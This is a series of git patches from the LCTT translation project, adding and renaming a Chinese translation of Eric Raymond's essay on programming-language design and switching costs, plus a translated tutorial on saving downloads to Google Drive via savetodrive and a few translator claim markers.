-## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
-## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
-## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
-## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
-## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
-
-
+ -最合理的语言工程模式
+ -============================================================
+ -
+ -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
+ -
+ -对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
+ -
+ -在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
+ -
+ -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
+ -
+ -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
+ -
+ -所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
+ -
+ -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
+ -
+ -如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
+ -
+ -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
+ -
+ -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
+ -
+ -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
+ -
+ -相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
+ -
+ -C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
+ -
+ -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
+ -
+ -今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
+ -
+ -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
+ -
+ -我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
+ -
+ -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
+ -
+ -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
+ -
+ -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
+ -
+ -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
+ -
+ ---------------------------------------------------------------------------------
+ -
+ -via: http://esr.ibiblio.org/?p=7745
+ -
+ -作者:[Eric Raymond ][a]
+ -译者:[Valoniakim](https://github.com/Valoniakim)
+ -校对:[校对者ID](https://github.com/校对者ID)
+ -
+ -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+ -
+ -[a]:http://esr.ibiblio.org/?author=2
+ -[1]:http://esr.ibiblio.org/?author=2
+ -[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
+ -[3]:http://esr.ibiblio.org/?p=7745
From 1f9edc7325ab04fc87a6c4b35aff1fa5dbe90e24 Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 20:40:38 +0800
Subject: [PATCH 005/371] Rename Language engineering for great justice. to
20171118 Language engineering for great justice.
---
... justice. => 20171118 Language engineering for great justice.} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename translated/tech/{Language engineering for great justice. => 20171118 Language engineering for great justice.} (100%)
diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice.
similarity index 100%
rename from translated/tech/Language engineering for great justice.
rename to translated/tech/20171118 Language engineering for great justice.
From 7683f19b3eea039fe0de6dbe3342af78f30a4bed Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Tue, 5 Dec 2017 13:01:06 +0800
Subject: [PATCH 006/371] Delete Language engineering for great justice
---
.../Language engineering for great justice | 24 -------------------
1 file changed, 24 deletions(-)
delete mode 100644 translated/tech/Language engineering for great justice
diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice
deleted file mode 100644
index d26f9319bd..0000000000
--- a/translated/tech/Language engineering for great justice
+++ /dev/null
@@ -1,24 +0,0 @@
-最合理的语言工程模式
-当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
-对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
-在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
-在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
-现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
-所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
-在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
-如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
-这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
-在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
-当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
-相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
-C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
-另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
-今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
-即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
-我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
-这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
-当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
-五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
-在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
-
-
From d397c99a0c13a049a22b03bd4ca69c66408d246a Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Tue, 5 Dec 2017 13:13:33 +0800
Subject: [PATCH 007/371] Translated
---
...ustice. => 20171118 Language engineering for great justice.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename translated/tech/{20171118 Language engineering for great justice. => 20171118 Language engineering for great justice.md} (100%)
diff --git a/translated/tech/20171118 Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice.md
similarity index 100%
rename from translated/tech/20171118 Language engineering for great justice.
rename to translated/tech/20171118 Language engineering for great justice.md
From 171aa2209067b6db25c236e6d59022b59e9f0ae5 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Mon, 1 Jan 2018 23:12:29 +0800
Subject: [PATCH 008/371] translated
---
...ogle Drive And Download 10 Times Faster.md | 79 -------------------
...ogle Drive And Download 10 Times Faster.md | 49 ++++++++++++
2 files changed, 49 insertions(+), 79 deletions(-)
delete mode 100644 sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
create mode 100644 translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
diff --git a/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
deleted file mode 100644
index 164832ef3e..0000000000
--- a/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ /dev/null
@@ -1,79 +0,0 @@
-Drshu Translating
-Save Files Directly To Google Drive And Download 10 Times Faster
-======
-
-![][image-1]
-
-So recently I had to download the update package for my phone, but when I started downloading it, I found it was quite large: approximately 1.5 GB.
-
-[![downloading miui update from chorme][image-2]][1]
-
-Considering the download speed, it would have taken me at least 1 to 1.5 hours to download that file, and honestly, I didn't have much time. My download speed may be slow, but my ISP has Google Peering, which means that I get incredible speeds on all Google products like Google Drive, YouTube, and the Play Store.
-
-So I found a web service called [savetodrive][2]. This website can save files from the web directly to your Google Drive folder. You can then download the file from your Google Drive, which will be much faster.
-
-So let's see how to do it.
-
-### **Step 1**
-
-Get the Download URL of the file. Copy it to your clipboard.
-
-### **Step 2**
-
-Head over to [savetodrive][3] and click on Authenticate.
-
-[![savetodrive to save files to cloud drive][image-3]][4]
-
-This will ask for your permissions to use google drive. Click on Allow.
-
-[![http://www.zdnet.com/article/linux-totally-dominates-supercomputers/][image-4]][5]
-
-### **Step 3**
-
-You will see the following page again. Just enter the download link in the url box and click on Upload.
-
-[![savetodrive download file directly to cloud][image-5]][6]
-
-You will start seeing the upload progress bar. You can see that the upload speed is 48 MBps, so it will upload my 1.5 GB file in about 30-35 seconds. Once that is done, head over to your Google Drive and you will see the uploaded file.
-
-[![google drive savetodrive][image-6]][7]
-
-So the file that begins with **miui** is my file that I just uploaded. Now I can download it at great speed.
-
-[![how to download miui update from browser][image-7]][8]
-
-Now you can see my download speed is around 5 Mbps, so I will download that file in 5-6 minutes.
-
-So that was it guys. I always download my files like this. The service is completely free of charge and totally amazing.
-
-----
-
-via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-times-faster
-
-作者:[Rishabh Kandari][9]
-译者:[译者ID][10]
-校对:[校对者ID][11]
-
-本文由 [LCTT][12] 原创编译,[Linux中国][13] 荣誉推出
-
-[1]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[2]: https://savetodrive.net/
-[3]: http://www.savetodrive.net
-[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
-[9]: http://www.theitstuff.com/author/reevkandari
-[10]: https://github.com/%E8%AF%91%E8%80%85ID
-[11]: https://github.com/%E6%A0%A1%E5%AF%B9%E8%80%85ID
-[12]: https://github.com/LCTT/TranslateProject
-[13]: https://linux.cn/
-
-[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
-[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
new file mode 100644
index 0000000000..bf28c77328
--- /dev/null
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -0,0 +1,49 @@
+
+# 直接保存文件至 Google Drive 并用十倍的速度下载回来
+最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
+
+[downloading miui update from chorme](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+
+考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
+
+所以我找到一个网络服务叫做[savetodrive](https://savetodrive.net/)。这个网站可以从网页上直接保存文件到你的 Google Drive 文件夹之中。之后你就可以从你的 Google Drive 上面下载它,这样的下载速度会快很多。
+
+现在让我们来看看如何操作。
+
+### *第一步*
+获得文件的下载链接,将它复制到你的剪贴板。
+
+### *第二步*
+前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
+
+[savetodrive to save files to cloud drive](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+
+这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
+
+[http://www.zdnet.com/article/linux-totally-dominates-supercomputers/](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+
+### *第三步*
+你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
+
+[savetodrive download file directly to cloud](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+
+你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
+
+[google drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+
+这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
+
+[how to download miui update from browser](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+
+可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
+
+所以就是这样的,我经常用这样的方法下载文件,最令人惊讶的是,这个服务是完全免费的。
+
+---
+
+via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-times-faster
+
+作者:[Rishabh Kandari](http://www.theitstuff.com/author/reevkandari)
+译者:[Drshu]
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 90035543920a3db21d9429e09b8d613ea03b99a1 Mon Sep 17 00:00:00 2001
From: datastruct
Date: Fri, 5 Jan 2018 15:33:42 +0800
Subject: [PATCH 009/371] Update 20171228 Linux wc Command Explained for
Beginners (6 Examples).md
---
...1228 Linux wc Command Explained for Beginners (6 Examples).md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
index 7b4143473f..b6088797f9 100644
--- a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
@@ -1,3 +1,4 @@
+translating by stevenzdg988
Linux wc Command Explained for Beginners (6 Examples)
======
From 4ccce4496983ef27ecf2c0d56313bbb4eccc9313 Mon Sep 17 00:00:00 2001
From: datastruct
Date: Fri, 5 Jan 2018 15:34:01 +0800
Subject: [PATCH 010/371] Update 20171228 Linux wc Command Explained for
Beginners (6 Examples).md
---
...1228 Linux wc Command Explained for Beginners (6 Examples).md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
index b6088797f9..2d46a74207 100644
--- a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
@@ -1,4 +1,5 @@
translating by stevenzdg988
+
Linux wc Command Explained for Beginners (6 Examples)
======
From 47406977516f475a82652a0487f37931fe6c5ea1 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Fri, 5 Jan 2018 19:51:50 +0800
Subject: [PATCH 011/371] translating by stevenzdg988
---
sources/tech/20171031 Migrating to Linux- An Introduction.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171031 Migrating to Linux- An Introduction.md b/sources/tech/20171031 Migrating to Linux- An Introduction.md
index 2dcc13f0f6..513a8cd721 100644
--- a/sources/tech/20171031 Migrating to Linux- An Introduction.md
+++ b/sources/tech/20171031 Migrating to Linux- An Introduction.md
@@ -1,3 +1,5 @@
+stevenzdg988 translating!!
+
Migrating to Linux: An Introduction
======
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
From ecb57ced6ad0fe518bb6fdbd57df59c4d1a5c81b Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:22:56 +0800
Subject: [PATCH 012/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Make=20=E2=80=9Cr?=
=?UTF-8?q?m=E2=80=9D=20Command=20To=20Move=20The=20Files=20To=20=E2=80=9C?=
=?UTF-8?q?Trash=20Can=E2=80=9D=20Instead=20Of=20Removing=20Them=20Complet?=
=?UTF-8?q?ely?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...an- Instead Of Removing Them Completely.md | 113 ++++++++++++++++++
1 file changed, 113 insertions(+)
create mode 100644 sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md
